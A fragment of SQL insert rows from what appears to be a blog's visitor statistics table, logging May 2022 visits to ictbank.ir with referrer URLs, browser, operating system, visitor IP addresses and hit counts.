(20824,'2022-05-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(20825,'2022-05-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20826,'2022-05-08','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','104.223.52.95','000',0,1,0),
(20827,'2022-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(20828,'2022-05-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,2,0),
(20829,'2022-05-08','http://ictbank.ir/blog/index.php/category/web-security/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.6','000',0,8,0),
(20830,'2022-05-08','http://ictbank.ir/blog','Chrome','OS X','10.11',NULL,NULL,'','61.147.15.67','000',0,4,0),
(20831,'2022-05-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(20832,'2022-05-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,10,0),
(20833,'2022-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(20834,'2022-05-08','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','109.230.220.182','000',0,1,0),
(20835,'2022-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20836,'2022-05-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.27.59.98','000',0,1,0),
(20837,'2022-05-08','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.86.224.49','000',0,2,0),
(20838,'2022-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20839,'2022-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(20840,'2022-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20841,'2022-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20842,'2022-05-08','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','191.96.168.31','000',0,1,0),
(20843,'2022-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(20844,'2022-05-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20845,'2022-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(20846,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.69.58.136','000',0,1,0),
(20847,'2022-05-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.148','000',0,1,0),
(20848,'2022-05-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.147','000',0,5,0),
(20849,'2022-05-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.159','000',0,5,0),
(20850,'2022-05-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,4,0),
(20851,'2022-05-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,8,0),
(20852,'2022-05-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','132.148.202.152','000',0,1,0),
(20853,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.191.114','000',0,1,0),
(20854,'2022-05-09','http://ictbank.ir/blog','Opera','OS X','10.13.3',NULL,NULL,'','196.245.158.125','000',0,1,0),
(20855,'2022-05-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','223.140.214.252','000',0,1,0),
(20856,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(20857,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.223.191.141','000',0,2,0),
(20858,'2022-05-09','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','69.162.89.188','000',0,1,0),
(20859,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.107.246.168','000',0,1,0),
(20860,'2022-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20861,'2022-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(20862,'2022-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20863,'2022-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20864,'2022-05-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(20865,'2022-05-09','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.66','000',0,8,0),
(20866,'2022-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.78.47.230','000',0,1,0),
(20867,'2022-05-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','152.32.133.127','000',0,2,0),
(20868,'2022-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.195.246.122','000',0,4,0),
(20869,'2022-05-10','http://ictbank.ir/blog','Opera','OS X','10.13.3',NULL,NULL,'','196.247.160.106','000',0,1,0),
(20870,'2022-05-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,10,0),
(20871,'2022-05-10','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.155','000',0,1,0),
(20872,'2022-05-10','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','167.232.235.15','000',0,1,0),
(20873,'2022-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(20874,'2022-05-10','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.148','000',0,5,0),
(20875,'2022-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.59.180.181','000',0,1,0),
(20876,'2022-05-10','http://ictbank.ir/blog/tag/asm/','Firefox','Windows','5.1',NULL,NULL,'','20.113.165.81','000',0,1,0),
(20877,'2022-05-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20878,'2022-05-10','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.53','000',0,3,0),
(20879,'2022-05-10','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','134.249.133.142','000',0,2,0),
(20880,'2022-05-10','http://ictbank.ir/blog/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.144','000',0,8,0),
(20881,'2022-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(20882,'2022-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(20883,'2022-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20884,'2022-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20885,'2022-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(20886,'2022-05-10','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','102.42.128.79','000',0,1,0),
(20887,'2022-05-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.25.195.227','000',0,1,0),
(20888,'2022-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.243','000',0,1,0),
(20889,'2022-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(20890,'2022-05-11','http://ictbank.ir/blog/index.php/tag/script/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.144','000',0,7,0),
(20891,'2022-05-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','78.135.80.218','000',0,2,0),
(20892,'2022-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(20893,'2022-05-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,5,0),
(20894,'2022-05-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','54.162.6.3','000',0,1,0),
(20895,'2022-05-11','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,6,0),
(20896,'2022-05-11','http://wikisonnati.com','Chrome','Windows','6.1',NULL,NULL,'','128.127.67.205','000',0,2,0),
(20897,'2022-05-11','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','50.31.21.6','000',0,2,0),
(20898,'2022-05-11','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','54.38.55.122','000',0,1,0),
(20899,'2022-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.83','000',0,1,0),
(20900,'2022-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.17.249','000',0,1,0),
(20901,'2022-05-11','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.114','000',0,1,0),
(20902,'2022-05-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(20903,'2022-05-11','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','27.227.187.115','000',0,1,0),
(20904,'2022-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,2,0),
(20905,'2022-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,2,0),
(20906,'2022-05-11','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.237','000',0,2,0),
(20907,'2022-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(20908,'2022-05-12','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.137','000',0,2,0),
(20909,'2022-05-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,16,0),
(20910,'2022-05-12','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','43.224.182.119','000',0,1,0),
(20911,'2022-05-12','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','222.209.51.43','000',0,1,0),
(20912,'2022-05-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20913,'2022-05-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20914,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','23.22.189.229','000',0,2,0),
(20915,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','152.32.215.238','000',0,1,0),
(20916,'2022-05-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(20917,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.9.98.2','000',0,1,0),
(20918,'2022-05-12','http://ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','104.149.159.152','000',0,1,0),
(20919,'2022-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','173.231.245.32','000',0,1,0),
(20920,'2022-05-12','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','41.63.22.182','000',0,1,0),
(20921,'2022-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(20922,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.114.48','000',0,1,0),
(20923,'2022-05-12','http://ictbank.ir/','Chrome','OS X','10.13.3',NULL,NULL,'','34.243.220.88','000',0,1,0),
(20924,'2022-05-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,4,0),
(20925,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(20926,'2022-05-12','http://ictbank.ir/blog/index.php/tag/network/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.4','000',0,7,0),
(20927,'2022-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.141.41.15','000',0,2,0),
(20928,'2022-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.198.140.126','000',0,2,0),
(20929,'2022-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','205.185.120.71','000',0,2,0),
(20930,'2022-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(20931,'2022-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(20932,'2022-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(20933,'2022-05-12','http://ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','191.102.151.29','000',0,1,0),
(20934,'2022-05-12','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.60.98','000',0,1,0),
(20935,'2022-05-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(20936,'2022-05-12','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','151.62.32.49','000',0,1,0),
(20937,'2022-05-13','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.124.5.124','000',0,3,0),
(20938,'2022-05-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,14,0),
(20939,'2022-05-13','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','69.116.112.253','000',0,1,0),
(20940,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.190','000',0,2,0),
(20941,'2022-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','37.19.223.35','000',0,1,0),
(20942,'2022-05-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,4,0),
(20943,'2022-05-13','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,3,0),
(20944,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','54.167.137.127','000',0,2,0),
(20945,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(20946,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','124.120.169.134','000',0,4,0),
(20947,'2022-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.113.181','000',0,2,0),
(20948,'2022-05-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20949,'2022-05-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(20950,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.64.56.78','000',0,2,0),
(20951,'2022-05-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.219.215.157','000',0,2,0),
(20952,'2022-05-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(20953,'2022-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.79.193','000',0,1,0),
(20954,'2022-05-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','174.192.201.110','000',0,1,0),
(20955,'2022-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.114','000',0,2,0),
(20956,'2022-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20957,'2022-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,2,0),
(20958,'2022-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(20959,'2022-05-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(20960,'2022-05-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.128.248.109','000',0,1,0),
(20961,'2022-05-14','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.184','000',0,1,0),
(20962,'2022-05-14','http://ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','196.240.237.143','000',0,13,0),
(20963,'2022-05-14','http://www.ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','165.231.97.30','000',0,2,0),
(20964,'2022-05-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20965,'2022-05-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.114.54','000',0,1,0),
(20966,'2022-05-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(20967,'2022-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(20968,'2022-05-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.17','000',0,2,0),
(20969,'2022-05-14','http://www.bing.com/search?q=zip+file+of+99-grid-oracle-limits.conf&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(20970,'2022-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(20971,'2022-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20972,'2022-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20973,'2022-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20974,'2022-05-14','http://ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','3.80.22.167','000',0,1,0),
(20975,'2022-05-14','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','44.200.68.183','000',0,1,0),
(20976,'2022-05-14','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.66','000',0,8,0),
(20977,'2022-05-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(20978,'2022-05-15','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.205.50.160','000',0,1,0),
(20979,'2022-05-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(20980,'2022-05-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','121.169.112.144','000',0,1,0),
(20981,'2022-05-15','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','45.32.203.197','000',0,3,0),
(20982,'2022-05-15','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20983,'2022-05-15','http://ictbank.ir/blog/index.php/2021/02/06/hosting-a-podcast/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.8','000',0,8,0),
(20984,'2022-05-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(20985,'2022-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,1,0),
(20986,'2022-05-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.188.252','000',0,2,0),
(20987,'2022-05-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','163.44.198.59','000',0,1,0),
(20988,'2022-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(20989,'2022-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(20990,'2022-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20991,'2022-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20992,'2022-05-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20993,'2022-05-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.120.220','000',0,1,0),
(20994,'2022-05-16','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','116.206.244.136','000',0,1,0),
(20995,'2022-05-16','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.21','000',0,2,0),
(20996,'2022-05-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.16.85.141','000',0,1,0),
(20997,'2022-05-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.238','000',0,2,0),
(20998,'2022-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.92.109','000',0,1,0),
(20999,'2022-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.97.103.49','000',0,1,0),
(21000,'2022-05-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.232','000',0,4,0),
(21001,'2022-05-16','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','94.247.172.129','000',0,2,0),
(21002,'2022-05-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.226','000',0,2,0),
(21003,'2022-05-16','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,2,0),
(21004,'2022-05-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,2,0),
(21005,'2022-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(21006,'2022-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(21007,'2022-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21008,'2022-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(21009,'2022-05-16','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.66','000',0,8,0),
(21010,'2022-05-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21011,'2022-05-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(21012,'2022-05-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.228','000',0,2,0),
(21013,'2022-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(21014,'2022-05-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.186','000',0,2,0),
(21015,'2022-05-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.185.113','000',0,2,0),
(21016,'2022-05-17','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,5,0),
(21017,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(21018,'2022-05-17','http://ictbank.ir/blog/index.php/tag/import/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.144','000',0,7,0),
(21019,'2022-05-17','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','207.188.160.66','000',0,1,0),
(21020,'2022-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21021,'2022-05-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.146','000',0,1,0),
(21022,'2022-05-17','http://mail.design-arena.ir:80/blog','Safari','OS X','10.11.2',NULL,NULL,'','2.57.122.115','000',0,7,0),
(21023,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.69.98','000',0,4,0),
(21024,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,1,0),
(21025,'2022-05-17','http://ictbank.ir/blog','Unknown','OS X','10.12.6',NULL,NULL,'','34.213.223.38','000',0,2,0),
(21026,'2022-05-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(21027,'2022-05-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21028,'2022-05-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.161.123','000',0,1,0),
(21029,'2022-05-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','171.34.176.215','000',0,1,0),
(21030,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.100.252','000',0,1,0),
(21031,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.245.60.237','000',0,2,0),
(21032,'2022-05-17','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.7.5','000',0,1,0),
(21033,'2022-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(21034,'2022-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(21035,'2022-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21036,'2022-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21037,'2022-05-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(21038,'2022-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.208.236.252','000',0,2,0),
(21039,'2022-05-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','200.92.197.178','000',0,1,0),
(21040,'2022-05-17','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','107.0.105.193','000',0,1,0),
(21041,'2022-05-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21042,'2022-05-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,9,0),
(21043,'2022-05-18','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21044,'2022-05-18','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','134.249.133.142','000',0,2,0),
(21045,'2022-05-18','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','50.118.211.10','000',0,1,0),
(21046,'2022-05-18','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','43.245.86.85','000',0,1,0),
(21047,'2022-05-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(21048,'2022-05-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','27.57.77.49','000',0,1,0),
